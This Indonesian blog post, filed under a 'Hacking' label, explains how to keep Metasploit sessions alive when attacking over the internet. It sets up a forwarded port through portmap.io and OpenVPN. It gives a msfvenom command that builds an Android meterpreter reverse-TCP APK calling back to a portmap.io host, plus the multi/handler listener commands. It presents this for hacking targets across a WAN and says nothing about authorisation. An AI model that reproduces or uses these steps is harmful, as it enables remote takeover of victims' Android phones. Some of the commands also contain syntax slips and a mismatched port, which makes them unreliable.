Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, July 31, 2018

Cara Mengatasi Session Died di Metasploit dan Koneksi VPN yang Tidak Stabil

Virtual Online Macrhmadness Artikel kali ini saya ambil dari salah satu Blog partner kami yaitu Tutorial Termux yang berfokus pada linux di Android yaitu Termux. Tapi untuk cara atasi session died di metasploit sama saja seperti di distro Linux lainnya.
Lansung saja baca dengan santai, jangan lupa sediakan kopi dan rokok :D
Karena sebagian besar ISP tidak menyediakan port forwarding, peretasan pada WAN selalu menjadi tugas yang sulit beberapa tahun lalu. Kemudian, SSH tunneling dan Premium VPN datang sebagai alternatif untuk Port Forwarding dan memungkinkan peretas meretas WAN.

Server Ngrok sebagai penyedia tunneling SSH terkemuka, tetapi masalah dengan mereka adalah kurangnya ketekunan. Setiap kali saat Anda tersambung kembali, Anda akan diberikan subdomain acak.

Untuk mengatasi hal ini, Serveo.net hadir dengan fitur "Subdomain Unik" yang memungkinkan pengguna untuk memilih subdomain mereka sendiri. Padahal, Serveo.net tidak mencapai banyak seperti ngrok lakukan.

Masalah dengan VPN berbayar adalah biaya mereka. Meskipun mereka menyediakan fasilitas port forwarding, biayanya lebih mahal. Sekarang, Portmap.io com menawarkan konfigurasi pemetaan port gratis yang dapat digunakan dengan Open VPN untuk penerusan port dan melakukan pengujian Penetrasi melalui WAN.

Hal-hal yang Anda perlukan sebelum melanjutkan:

aplikasi OpenVPN
Akun portmap.io
Metasploit, Jika anda belum menginstallnya. Silahkan Baca : Install Metasploit Termux Without Error Fix

Hack WAN Tanpa Port Forwarding menggunakan Portmap.io:
Install OpenVPN, ambil didieu.
Sekarang, login ke akun portmap.io Anda.
Setelah login, click "Create New Configuration"
Pilih nama untuk konfigurasi Anda. (Dalam olan gratis portmap.io, Anda dapat mengonfigurasi hanya satu pemetaan saja. Anda harus membayar dan berlangganan untuk lebih banyak lagi)
Tipe default adalah "Open VPN"
Ubah protokol menjadi "TCP" jika berada di UDP secara default.
Sekarang, klik "Generate" untuk menghasilkan file konfigurasi
Setelah itu, Unduh file konfigurasi.
Setelah mengunduh, klik "Create" untuk membuat file. (Anda dapat mengunduh sebelum pembuatan)
Sekarang berhasil membuat file konfigurasi, Beralih ke "Mapping Rules" dan klik "Crate New Rules"
Sekarang, konfigurasikan Aturan seperti yang diberikan pada gambar di bawah ini
Semua nilai akan diisi secara default, yang harus Anda lakukan hanyalah memilih port untuk diteruskan.
Disini, saya memilih untuk meneruskan port 4444. Anda dapat memilih port Anda sendiri.
Setelah memasukkan port pilihan Anda, Klik "create" untuk membuat Maping Rules.
Dalam pembuatan payload, "humanerror666-51596.portmap.io" akan berfungsi sebagai Lhost dan 51596 akan berfungsi sebagai Lport.
Untuk Android buka aplikasi OpenVPN,
 Clik OVPN Profile
lalu buka file ovpn yang telah anda unduh tadi. Klik Import

Lalu ADD

Dan Connect-kan tombolnya berasa di bawah tulisan DISCONNECTED
Sekarang, koneksi vpn akan dimulai dan Anda akan terhubung ke vpn.
Untuk membuat payload dengan msfvenom, ketik,
$ msfvenom -p android/meterpreter/reverse_tcp LHOST = humanerror666-51596.portmap.io LPORT = 51596 R> sdcard/nama_payload.apk

Setelah sukses membuat payload, untuk membuat listener di Metasploit, ketik
$ use exploit/multi/handler 
set payload /android/meterpreter/reverse_tcp 
set lhost humanerror666-51596.portmap.io
set lport 4444
exploit 

Kelebihan menggunakan Portmap.io adalah Anda tidak akan lagi mengalami session died dan Anda tidak perlu mensetting ulang payload untuk mendapatkan listener.

Jika Anda memiliki pertanyaan, Silahkan beri komentar di Artikel ini. Share Artikel ini jika Anda suka :D Terimakasih .

Catatan : Untuk OpenVPN-nya gunakan OpenVPN dari repositories. Jika belum ada silahkan ikuti saja perintahnya :
apt-get install openvpn

Lalu load file ovpn tadi dengan perintah
openvpn <nama config config file>
Read More